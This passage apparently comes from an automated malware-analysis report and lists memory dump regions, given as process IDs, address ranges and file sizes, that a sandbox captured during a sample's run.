            • memory/924-142-0x0000000006710000-0x0000000006711000-memory.dmp
              Filesize

              4KB

            • memory/924-50-0x00000000028A0000-0x00000000028A1000-memory.dmp
              Filesize

              4KB

            • memory/924-56-0x0000000005480000-0x0000000005481000-memory.dmp
              Filesize

              4KB

            • memory/924-85-0x00000000064C0000-0x00000000064C1000-memory.dmp
              Filesize

              4KB

            • memory/924-64-0x0000000006240000-0x0000000006241000-memory.dmp
              Filesize

              4KB

            • memory/1120-21-0x0000000000000000-mapping.dmp
            • memory/1236-200-0x0000000000400000-0x0000000000425000-memory.dmp
              Filesize

              148KB

            • memory/1236-201-0x000000000041A684-mapping.dmp
            • memory/1236-204-0x0000000000400000-0x0000000000425000-memory.dmp
              Filesize

              148KB

            • memory/1340-10-0x0000000000000000-mapping.dmp
            • memory/1404-18-0x0000000000000000-mapping.dmp
            • memory/1532-328-0x0000000070340000-0x0000000070A2E000-memory.dmp
              Filesize

              6.9MB

            • memory/1532-329-0x0000000000C20000-0x0000000000C21000-memory.dmp
              Filesize

              4KB

            • memory/1532-375-0x0000000000BC0000-0x0000000000BE3000-memory.dmp
              Filesize

              140KB

            • memory/1532-325-0x0000000000000000-mapping.dmp
            • memory/1532-377-0x0000000004130000-0x0000000004154000-memory.dmp
              Filesize

              144KB

            • memory/1536-38-0x0000000004C20000-0x0000000004C21000-memory.dmp
              Filesize

              4KB

            • memory/1536-16-0x00000000712C0000-0x00000000719AE000-memory.dmp
              Filesize

              6.9MB

            • memory/1536-12-0x0000000000000000-mapping.dmp
            • memory/1628-41-0x00000000712C0000-0x00000000719AE000-memory.dmp
              Filesize

              6.9MB

            • memory/1628-31-0x0000000000000000-mapping.dmp
            • memory/1780-0-0x0000000000000000-mapping.dmp
            • memory/1840-11-0x0000000000000000-mapping.dmp
            • memory/1856-5-0x0000000000000000-mapping.dmp
            • memory/1856-4-0x0000000000000000-mapping.dmp
            • memory/1876-236-0x0000000000120000-0x0000000000121000-memory.dmp
              Filesize

              4KB

            • memory/1876-283-0x0000000004C60000-0x0000000004C62000-memory.dmp
              Filesize

              8KB

            • memory/1876-235-0x00000000705D0000-0x0000000070CBE000-memory.dmp
              Filesize

              6.9MB

            • memory/1876-233-0x0000000000000000-mapping.dmp
            • memory/1876-275-0x00000000007C0000-0x0000000000811000-memory.dmp
              Filesize

              324KB

            • memory/1876-238-0x00000000003D0000-0x00000000003D1000-memory.dmp
              Filesize

              4KB

            • memory/1884-356-0x00000000004F0000-0x0000000000501000-memory.dmp
              Filesize

              68KB

            • memory/1884-30-0x0000000000000000-mapping.dmp
            • memory/1884-363-0x0000000000600000-0x0000000000603000-memory.dmp
              Filesize

              12KB

            • memory/1884-44-0x00000000712C0000-0x00000000719AE000-memory.dmp
              Filesize

              6.9MB

            • memory/1884-351-0x00000000004D0000-0x00000000004D1000-memory.dmp
              Filesize

              4KB

            • memory/1884-348-0x0000000001290000-0x0000000001291000-memory.dmp
              Filesize

              4KB

            • memory/1884-344-0x0000000070340000-0x0000000070A2E000-memory.dmp
              Filesize

              6.9MB

            • memory/1884-340-0x0000000000000000-mapping.dmp
            • memory/1916-8-0x0000000000000000-mapping.dmp
            • memory/1952-13-0x0000000000000000-mapping.dmp
            • memory/1952-15-0x00000000712C0000-0x00000000719AE000-memory.dmp
              Filesize

              6.9MB

            • memory/2024-338-0x0000000070340000-0x0000000070A2E000-memory.dmp
              Filesize

              6.9MB

            • memory/2024-350-0x0000000000370000-0x0000000000371000-memory.dmp
              Filesize

              4KB

            • memory/2024-335-0x0000000000000000-mapping.dmp
            • memory/2024-361-0x0000000004A60000-0x0000000004A62000-memory.dmp
              Filesize

              8KB

            • memory/2024-355-0x00000000006E0000-0x00000000006F0000-memory.dmp
              Filesize

              64KB

            • memory/2024-353-0x0000000000600000-0x0000000000605000-memory.dmp
              Filesize

              20KB

            • memory/2024-345-0x0000000000AD0000-0x0000000000AD1000-memory.dmp
              Filesize

              4KB

            • memory/2024-352-0x0000000000590000-0x00000000005A2000-memory.dmp
              Filesize

              72KB

            • memory/2052-224-0x0000000000000000-mapping.dmp
            • memory/2124-331-0x0000000000000000-mapping.dmp
            • memory/2124-385-0x0000000003110000-0x000000000315C000-memory.dmp
              Filesize

              304KB

            • memory/2180-359-0x0000000000000000-mapping.dmp
            • memory/2268-286-0x0000000000417A8B-mapping.dmp
            • memory/2268-285-0x0000000000400000-0x0000000000434000-memory.dmp
              Filesize

              208KB

            • memory/2268-288-0x0000000000400000-0x0000000000434000-memory.dmp
              Filesize

              208KB

            • memory/2292-314-0x0000000000000000-mapping.dmp
            • memory/2352-269-0x0000000000417A8B-mapping.dmp
            • memory/2352-263-0x0000000000417A8B-mapping.dmp
            • memory/2352-268-0x0000000000417A8B-mapping.dmp
            • memory/2352-267-0x0000000000417A8B-mapping.dmp
            • memory/2352-266-0x0000000000417A8B-mapping.dmp
            • memory/2352-265-0x0000000000417A8B-mapping.dmp
            • memory/2352-264-0x0000000000417A8B-mapping.dmp
            • memory/2352-272-0x0000000000417A8B-mapping.dmp
            • memory/2352-262-0x0000000000417A8B-mapping.dmp
            • memory/2352-271-0x0000000000417A8B-mapping.dmp
            • memory/2352-273-0x0000000000417A8B-mapping.dmp
            • memory/2352-270-0x0000000000417A8B-mapping.dmp
            • memory/2352-211-0x0000000000417A8B-mapping.dmp
            • memory/2444-218-0x000000000041A684-mapping.dmp
            • memory/2568-104-0x0000000000000000-mapping.dmp
            • memory/2568-109-0x00000000008A0000-0x00000000008A1000-memory.dmp
              Filesize

              4KB

            • memory/2568-215-0x0000000004B90000-0x0000000004C40000-memory.dmp
              Filesize

              704KB

            • memory/2568-107-0x00000000712C0000-0x00000000719AE000-memory.dmp
              Filesize

              6.9MB

            • memory/2568-225-0x00000000007B0000-0x00000000007BD000-memory.dmp
              Filesize

              52KB

            • memory/2596-341-0x0000000000000000-mapping.dmp
            • memory/2624-308-0x0000000000400000-0x0000000000420000-memory.dmp
              Filesize

              128KB

            • memory/2624-311-0x0000000000400000-0x0000000000420000-memory.dmp
              Filesize

              128KB

            • memory/2624-309-0x000000000041A684-mapping.dmp
            • memory/2624-113-0x0000000000000000-mapping.dmp
            • memory/2656-121-0x0000000000000000-mapping.dmp
            • memory/2688-229-0x0000000000400000-0x0000000000493000-memory.dmp
              Filesize

              588KB

            • memory/2688-226-0x0000000000400000-0x0000000000493000-memory.dmp
              Filesize

              588KB

            • memory/2688-227-0x000000000043FCC3-mapping.dmp
            • memory/2692-163-0x000007FEF6AE0000-0x000007FEF6D5A000-memory.dmp
              Filesize

              2.5MB

            • memory/2724-382-0x0000000002800000-0x0000000002801000-memory.dmp
              Filesize

              4KB

            • memory/2724-381-0x0000000004C00000-0x0000000004C01000-memory.dmp
              Filesize

              4KB

            • memory/2724-379-0x0000000070340000-0x0000000070A2E000-memory.dmp
              Filesize

              6.9MB

            • memory/2724-383-0x0000000002A20000-0x0000000002A21000-memory.dmp
              Filesize

              4KB

            • memory/2724-376-0x0000000000000000-mapping.dmp
            • memory/2724-380-0x0000000001090000-0x0000000001091000-memory.dmp
              Filesize

              4KB

            • memory/2764-347-0x0000000000000000-mapping.dmp
            • memory/2836-148-0x0000000000000000-mapping.dmp
            • memory/2852-146-0x0000000000000000-mapping.dmp
            • memory/2876-254-0x0000000000000000-mapping.dmp
            • memory/2892-157-0x0000000000000000-mapping.dmp
            • memory/2904-155-0x0000000000000000-mapping.dmp
            • memory/2928-255-0x0000000000000000-mapping.dmp
            • memory/2928-277-0x0000000002770000-0x0000000002781000-memory.dmp
              Filesize

              68KB

            • memory/2928-256-0x0000000000AB0000-0x0000000000AC1000-memory.dmp
              Filesize

              68KB

            • memory/2928-274-0x0000000002770000-0x0000000002781000-memory.dmp
              Filesize

              68KB

            • memory/2932-261-0x0000000000000000-mapping.dmp
            • memory/2944-369-0x0000000004B30000-0x0000000004B31000-memory.dmp
              Filesize

              4KB

            • memory/2944-370-0x0000000002910000-0x0000000002911000-memory.dmp
              Filesize

              4KB

            • memory/2944-371-0x0000000004A70000-0x0000000004A71000-memory.dmp
              Filesize

              4KB

            • memory/2944-368-0x0000000000EB0000-0x0000000000EB1000-memory.dmp
              Filesize

              4KB

            • memory/2944-367-0x0000000070340000-0x0000000070A2E000-memory.dmp
              Filesize

              6.9MB

            • memory/2944-365-0x0000000000000000-mapping.dmp
            • memory/2948-387-0x00000000000D0000-0x00000000000D1000-memory.dmp
              Filesize

              4KB

            • memory/2948-452-0x0000000000000000-mapping.dmp
            • memory/2948-536-0x0000000000000000-mapping.dmp
            • memory/2948-534-0x0000000000000000-mapping.dmp
            • memory/2948-532-0x0000000000000000-mapping.dmp
            • memory/2948-530-0x0000000000000000-mapping.dmp
            • memory/2948-528-0x0000000000000000-mapping.dmp
            • memory/2948-526-0x0000000000000000-mapping.dmp
            • memory/2948-388-0x0000000000000000-mapping.dmp
            • memory/2948-389-0x0000000000110000-0x0000000000111000-memory.dmp
              Filesize

              4KB

            • memory/2948-390-0x0000000000000000-mapping.dmp
            • memory/2948-392-0x0000000000000000-mapping.dmp
            • memory/2948-394-0x0000000000000000-mapping.dmp
            • memory/2948-396-0x0000000000000000-mapping.dmp
            • memory/2948-398-0x0000000000000000-mapping.dmp
            • memory/2948-400-0x0000000000000000-mapping.dmp
            • memory/2948-402-0x0000000000000000-mapping.dmp
            • memory/2948-404-0x0000000000000000-mapping.dmp
            • memory/2948-406-0x0000000000000000-mapping.dmp
            • memory/2948-408-0x0000000000000000-mapping.dmp
            • memory/2948-410-0x0000000000000000-mapping.dmp
            • memory/2948-412-0x0000000000000000-mapping.dmp
            • memory/2948-414-0x0000000000000000-mapping.dmp
            • memory/2948-416-0x0000000000000000-mapping.dmp
            • memory/2948-418-0x0000000000000000-mapping.dmp
            • memory/2948-420-0x0000000000000000-mapping.dmp
            • memory/2948-422-0x0000000000000000-mapping.dmp
            • memory/2948-424-0x0000000000000000-mapping.dmp
            • memory/2948-426-0x0000000000000000-mapping.dmp
            • memory/2948-428-0x0000000000000000-mapping.dmp
            • memory/2948-430-0x0000000000000000-mapping.dmp
            • memory/2948-432-0x0000000000000000-mapping.dmp
            • memory/2948-434-0x0000000000000000-mapping.dmp
            • memory/2948-436-0x0000000000000000-mapping.dmp
            • memory/2948-438-0x0000000000000000-mapping.dmp
            • memory/2948-440-0x0000000000000000-mapping.dmp
            • memory/2948-442-0x0000000000000000-mapping.dmp
            • memory/2948-444-0x0000000000000000-mapping.dmp
            • memory/2948-446-0x0000000000000000-mapping.dmp
            • memory/2948-448-0x0000000000000000-mapping.dmp
            • memory/2948-450-0x0000000000000000-mapping.dmp
            • memory/2948-524-0x0000000000000000-mapping.dmp
            • memory/2948-454-0x0000000000000000-mapping.dmp
            • memory/2948-456-0x0000000000000000-mapping.dmp
            • memory/2948-458-0x0000000000000000-mapping.dmp
            • memory/2948-460-0x0000000000000000-mapping.dmp
            • memory/2948-462-0x0000000000000000-mapping.dmp
            • memory/2948-464-0x0000000000000000-mapping.dmp
            • memory/2948-466-0x0000000000000000-mapping.dmp
            • memory/2948-468-0x0000000000000000-mapping.dmp
            • memory/2948-470-0x0000000000000000-mapping.dmp
            • memory/2948-472-0x0000000000000000-mapping.dmp
            • memory/2948-474-0x0000000000000000-mapping.dmp
            • memory/2948-476-0x0000000000000000-mapping.dmp
            • memory/2948-478-0x0000000000000000-mapping.dmp
            • memory/2948-480-0x0000000000000000-mapping.dmp
            • memory/2948-482-0x0000000000000000-mapping.dmp
            • memory/2948-484-0x0000000000000000-mapping.dmp
            • memory/2948-486-0x0000000000000000-mapping.dmp
            • memory/2948-488-0x0000000000000000-mapping.dmp
            • memory/2948-490-0x0000000000000000-mapping.dmp
            • memory/2948-492-0x0000000000000000-mapping.dmp
            • memory/2948-494-0x0000000000000000-mapping.dmp
            • memory/2948-496-0x0000000000000000-mapping.dmp
            • memory/2948-498-0x0000000000000000-mapping.dmp
            • memory/2948-500-0x0000000000000000-mapping.dmp
            • memory/2948-502-0x0000000000000000-mapping.dmp
            • memory/2948-504-0x0000000000000000-mapping.dmp
            • memory/2948-506-0x0000000000000000-mapping.dmp
            • memory/2948-508-0x0000000000000000-mapping.dmp
            • memory/2948-510-0x0000000000000000-mapping.dmp
            • memory/2948-512-0x0000000000000000-mapping.dmp
            • memory/2948-514-0x0000000000000000-mapping.dmp
            • memory/2948-516-0x0000000000000000-mapping.dmp
            • memory/2948-518-0x0000000000000000-mapping.dmp
            • memory/2948-520-0x0000000000000000-mapping.dmp
            • memory/2948-522-0x0000000000000000-mapping.dmp
            • memory/2952-165-0x0000000000400000-0x0000000000498000-memory.dmp
              Filesize

              608KB

            • memory/2952-166-0x000000000043FCC3-mapping.dmp
            • memory/2952-168-0x0000000000400000-0x0000000000498000-memory.dmp
              Filesize

              608KB

            • memory/2976-173-0x000000000043FCC3-mapping.dmp
            • memory/3056-186-0x0000000000400000-0x0000000000439000-memory.dmp
              Filesize

              228KB

            • memory/3056-183-0x0000000000400000-0x0000000000439000-memory.dmp
              Filesize

              228KB

            • memory/3056-184-0x0000000000417A8B-mapping.dmp